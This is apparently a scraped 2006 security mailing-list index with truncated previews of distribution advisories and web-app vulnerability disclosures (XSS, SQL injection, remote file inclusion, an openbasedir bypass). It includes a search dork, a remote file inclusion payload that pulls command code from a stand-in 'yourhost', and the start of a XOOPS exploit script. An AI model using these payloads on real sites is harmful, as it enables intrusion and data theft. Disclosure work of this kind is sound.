|
Colapse all |
Post message
[ GLSA 200605-15 ] Quagga Routing Suite: Multiple vulnerabilities 2006-05-21 Stefan Cornelius (dercorny gentoo org) [ GLSA 200605-14 ] libextractor: Two heap-based buffer overflows 2006-05-21 Stefan Cornelius (dercorny gentoo org) [TZO-072006]-Xampp - Multiple Priviledge Escalation (SYSTEM) and Rogue Autostart 2006-05-21 Thierry Zoller (Thierry Zoller lu) XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit 2006-05-21 rgod autistici org #!/usr/bin/php -q -d short_open_tag=on <? echo "XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit\r\n"; echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; /* works with: magic_quotes_gpc = Off register_globals = On */ if ($argc<4) { echo " [ more ] [ reply ] Firefox 1.5.0.3 Flaw - Page can obtain path to Mozilla installation or profile by examining JavaScript exceptions 2006-05-21 milw0rm gmail com Captivate 1.0 - XSS Vuln 2006-05-21 luny youfucktard com Captivate 1.0 Homepage: http://new-place.org/scripts/ Description: A basic but highly-customizable PHP gallery script with optional thumbnail creation. Designed with screencaps in mind, it works best for large galleries of same-sized images. Effected files: gallery.php Inproper filt [ more ] [ reply ] [SECURITY] [DSA 1070-1] New Linux kernel 2.4.19 packages fix several vulnerabilities 2006-05-21 Moritz Muehlenhoff (jmm debian org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ -- Debian Security Advisory DSA 1070-1 security (at) debian (dot) org [email concealed] http://www.debian.org/security/ Martin Schulze, Dann Frazier May 21th, 2006 [ more ] [ reply ] Destiney Links Script v2.1.2 2006-05-21 luny youfucktard com Destiney Links Script v2.1.2 - XSS Vulnv & Full path errors. Homepage: http://destiney.com/scripts Description: Destiney Links is an Open Source project written in PHP for use with the MySQL Server entity. Links provides a pre-built, dynamically generated, Link site. Links counts referre [ more ] [ reply ] Destiney Rated Images Script v0.5.0 - XSS Vulnv 2006-05-21 luny youfucktard com Destiney Rated Images Script v0.5.0 Homepage: http://destiney.com/scripts Description: Destiney Rated Images script is continuation of the free phpRated script. Rated Images is a web application written in PHP for use with MySQL. Rated Images allows visitors to your site to list thei [ more ] [ reply ] PunBB 1.2.11 Cross site scripting 2006-05-21 k4p0k4p0 hotmail com /* --------------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST]® Advisory #22 --------------------------------------------------------------- Program : PunBB 1.2.11 Homepage: http://www.punbb.org Vulnerable Versions: PunBB 1.2.11 & lower ones Risk: Low! Impac [ more ] [ reply ] [SECURITY] [DSA 1069-1] New Linux kernel 2.4.18 packages fix several vulnerabilities 2006-05-21 Moritz Muehlenhoff (jmm debian org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ -- Debian Security Advisory DSA 1069-1 security (at) debian (dot) org [email concealed] http://www.debian.org/security/ Martin Schulze, Dann Frazier May 20th, 2006 [ more ] [ reply ] [SECURITY] [DSA 1068-1] New fbi packages fix denial of service 2006-05-20 Moritz Muehlenhoff (jmm debian org) cPanel OpenBaseDir Bypass 2006-05-20 i6d hotmail com Hey when you try to run a phpshell and open BaseDir is on you will se that: Open base dir: /home/***/:/usr/lib/php:/usr/local/lib/php:/tmp Okey.. now run the phpshell with user like that: http://server.***.com/~***/phpshell.php you will see that: Open base dir: OFF (not secure) ------------- [ more ] [ reply ] Zix Forum <= 1.12 (layid) SQL Injection Vulnerability 2006-05-20 i6d hotmail com Zix Forum <= 1.12 (layid) SQL Injection Vulnerability Vulnerability: -------------------- SQL_Injection: Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQ [ more ] [ reply ] [SECURITY] [DSA 1064-1] New cscope packages fix arbitrary code execution 2006-05-19 Moritz Muehlenhoff (jmm debian org) Re: NSA Group Security Advisory NSAG-¹196-23.02.2006 Vulnerability FCKeditor 2.2 2006-05-19 fredck fckeditor net [SECURITY] [DSA 1067-1] New Linux kernel 2.4.16 packages fix several vulnerabilities 2006-05-20 Moritz Muehlenhoff (jmm debian org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ -- Debian Security Advisory DSA 1067-1 security (at) debian (dot) org [email concealed] http://www.debian.org/security/ Martin Schulze, Dann Frazier May 20th, 2006 [ more ] [ reply ] Xtremescripts Topsites v1.1 2006-05-19 luny youfucktard com Xtremescripts Topsites v1.1 Homepage: http://www.xtremescripts.com/topsites.php Description: Xtreme Topsites is a popular topsite PHP script for websites. Most commonly used across anime websites at the moment. The topsite will count hits/clicks in and hits out and will rank them o [ more ] [ reply ] ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability 2006-05-20 i6d hotmail com ----------------------------------------------------------------- Vendor: ActualScripts URL: http://actualscripts.com ----------------------------------------------------------------- Credits: Discovered by: 'Aesthetico' http://www.majorsecurity.de ------------------------------------------ [ more ] [ reply ] Re: NSA Group Security Advisory NSAG-¹195-23.02.2006 Vulnerability FCKeditor 2.0 FC 2006-05-19 fredck fckeditor net phpBazar <= 2.1.0 Multiple vulnerabilites 2006-05-20 i6d hotmail com Title: phpBazar <= 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password: /admin/admin.php?action=edit_member&val [ more ] [ reply ] [SECURITY] [DSA 1066-1] New phpbb2 packages fix execution of arbitrary web script code 2006-05-20 Moritz Muehlenhoff (jmm debian org) [SECURITY] [DSA 1065-1] New hostapd packages fix denial of service 2006-05-20 Moritz Muehlenhoff (jmm debian org) |
|
Privacy Statement |
Gentoo Linux Security Advisory GLSA 200605-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
[ more ] [ reply ]